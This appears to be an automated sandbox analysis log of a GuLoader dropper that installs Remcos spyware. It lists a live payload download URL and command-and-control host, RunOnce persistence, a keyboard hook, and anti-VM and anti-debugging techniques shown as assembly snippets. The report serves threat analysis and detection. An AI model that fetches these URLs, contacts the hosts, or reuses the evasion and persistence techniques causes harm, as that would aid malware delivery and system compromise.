Source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp |
Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw"} |
Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe |
ReversingLabs: Detection: 17% |
Source: pRcHGlVekw.exe |
ReversingLabs: Detection: 17% |
Source: Yara match |
File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY |
Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe |
Joe Sandbox ML: detected |
Source: pRcHGlVekw.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: Malware configuration extractor |
URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw |
Source: unknown |
DNS query: name: wealthyrem.ddns.net |
Source: global traffic |
TCP traffic: 192.168.2.3:49737 -> 194.5.97.128:39200 |
Source: Joe Sandbox View |
IP Address: 194.5.97.128 194.5.97.128 |
Source: Joe Sandbox View |
IP Address: 101.99.94.119 101.99.94.119 |
Source: Joe Sandbox View |
ASN Name: DANILENKODE DANILENKODE |
Source: Joe Sandbox View |
ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY |
Source: global traffic |
HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 101.99.94.119 |
Source: global traffic |
HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache |
Source: unknown |
DNS traffic detected: queries for: wealthyrem.ddns.net |
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp |
String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin |
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp |
String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\pRcHGlVekw.exe |
Jump to behavior |
Source: Yara match |
File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process Stats: CPU usage > 98% |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218929D NtProtectVirtualMemory, |
1_2_0218929D |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218435F NtWriteVirtualMemory, |
1_2_0218435F |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021859E6 NtAllocateVirtualMemory, |
1_2_021859E6 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02185A22 NtAllocateVirtualMemory, |
1_2_02185A22 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218486E NtWriteVirtualMemory, |
1_2_0218486E |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021846AC NtWriteVirtualMemory, |
1_2_021846AC |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02184CFA NtWriteVirtualMemory, |
1_2_02184CFA |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218914B NtProtectVirtualMemory, |
1_2_0218914B |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02185564 NtWriteVirtualMemory,TerminateProcess, |
1_2_02185564 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02181766 NtWriteVirtualMemory, |
1_2_02181766 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02183DA0 NtWriteVirtualMemory, |
1_2_02183DA0 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218561A |
1_2_0218561A |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218226F |
1_2_0218226F |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02180E63 |
1_2_02180E63 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02189695 |
1_2_02189695 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021806BF |
1_2_021806BF |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218435F |
1_2_0218435F |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02188817 |
1_2_02188817 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02183A2B |
1_2_02183A2B |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02182021 |
1_2_02182021 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02188053 |
1_2_02188053 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02180248 |
1_2_02180248 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218486E |
1_2_0218486E |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218086F |
1_2_0218086F |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02185E60 |
1_2_02185E60 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02182A67 |
1_2_02182A67 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02185E67 |
1_2_02185E67 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02187C9A |
1_2_02187C9A |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021896A8 |
1_2_021896A8 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021846AC |
1_2_021846AC |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021886D9 |
1_2_021886D9 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02180CDF |
1_2_02180CDF |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02182EC2 |
1_2_02182EC2 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02184CFA |
1_2_02184CFA |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021810F0 |
1_2_021810F0 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02180CE4 |
1_2_02180CE4 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02183B1F |
1_2_02183B1F |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02184111 |
1_2_02184111 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02181113 |
1_2_02181113 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02181136 |
1_2_02181136 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02183123 |
1_2_02183123 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02182B4B |
1_2_02182B4B |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02183944 |
1_2_02183944 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02182F76 |
1_2_02182F76 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02185D6E |
1_2_02185D6E |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02188960 |
1_2_02188960 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02185564 |
1_2_02185564 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02181766 |
1_2_02181766 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02181BBB |
1_2_02181BBB |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02183DA0 |
1_2_02183DA0 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021879D6 |
1_2_021879D6 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021807F2 |
1_2_021807F2 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02180DF4 |
1_2_02180DF4 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021803F6 |
1_2_021803F6 |
Source: pRcHGlVekw.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: pRcHGlVekw.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: UNDERDEVELOPED.exe.16.dr |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: UNDERDEVELOPED.exe.16.dr |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: pRcHGlVekw.exe, 00000001.00000000.219062533.0000000000417000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe |
Source: pRcHGlVekw.exe, 00000001.00000002.344452128.0000000002090000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenameuser32j% vs pRcHGlVekw.exe |
Source: pRcHGlVekw.exe, 00000010.00000002.1306296984.000000001DD60000.00000002.00000001.sdmp |
Binary or memory string: OriginalFilenamemswsock.dll.muij% vs pRcHGlVekw.exe |
Source: pRcHGlVekw.exe, 00000010.00000000.341877354.0000000000417000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe |
Source: pRcHGlVekw.exe |
Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe |
Source: pRcHGlVekw.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winEXE@3/3@175/3 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File created: C:\Users\user\AppData\Roaming\remcos |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File created: C:\Users\user\AppData\Local\Temp\~DF4931134DE445F613.TMP |
Jump to behavior |
Source: pRcHGlVekw.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Section loaded: C:\Windows\SysWOW64\msvbvm60.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: pRcHGlVekw.exe |
ReversingLabs: Detection: 17% |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File read: C:\Users\user\Desktop\pRcHGlVekw.exe |
Jump to behavior |
Source: unknown |
Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe' |
|
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe' |
|
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe' |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 |
Jump to behavior |
Source: Yara match |
File source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_00407108 push ebp; retf |
1_2_00407109 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218A033 push ds; retf |
1_2_0218A036 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218A037 push ds; retf |
1_2_0218A03A |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218A02B push ds; retf |
1_2_0218A02E |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218A02F push ds; retf |
1_2_0218A032 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_0218A027 push ds; retf |
1_2_0218A02A |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 16_2_0056A037 push ds; retf |
16_2_0056A03A |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 16_2_0056A033 push ds; retf |
16_2_0056A036 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 16_2_0056A027 push ds; retf |
16_2_0056A02A |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 16_2_0056A02F push ds; retf |
16_2_0056A032 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 16_2_0056A02B push ds; retf |
16_2_0056A02E |
Source: initial sample |
Static PE information: section name: .text entropy: 7.08042704515 |
Source: initial sample |
Static PE information: section name: .text entropy: 7.08042704515 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File created: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe |
Jump to dropped file |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File opened: C:\Program Files\qga\qga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
File opened: C:\Program Files\qga\qga.exe |
Jump to behavior |
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\UNDERDEVELOPED.EXE\HOMOTYPYSET W = CREATEOBJECT("WSCRIPT.SHELL") |
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp |
Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE |
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\UNDERDEVELOPED.EXE\HOMOTYPYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEDRAWSPAN |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
RDTSC instruction interceptor: First address: 0000000002187EBB second address: 0000000002187EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
RDTSC instruction interceptor: First address: 0000000002187FF6 second address: 0000000002187FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
RDTSC instruction interceptor: First address: 0000000000567EBB second address: 0000000000567EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
RDTSC instruction interceptor: First address: 0000000000567FF6 second address: 0000000000567FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02187EB3 rdtsc |
1_2_02187EB3 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Window / User API: foregroundWindowGot 547 |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624 |
Thread sleep count: 276 > 30 |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624 |
Thread sleep time: -138000s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Last function: Thread delayed |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Last function: Thread delayed |
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\UNDERDEVELOPED.exe\HOMOTYPYSet W = CreateObject("WScript.Shell") |
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\UNDERDEVELOPED.exe\HOMOTYPYSoftware\Microsoft\Windows\CurrentVersion\RunOnceDRAWSPAN |
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp |
Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
System information queried: ModuleInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process queried: DebugPort |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process queried: DebugPort |
Jump to behavior |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02187EB3 rdtsc |
1_2_02187EB3 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02186663 LdrInitializeThunk, |
1_2_02186663 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02188817 mov eax, dword ptr fs:[00000030h] |
1_2_02188817 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
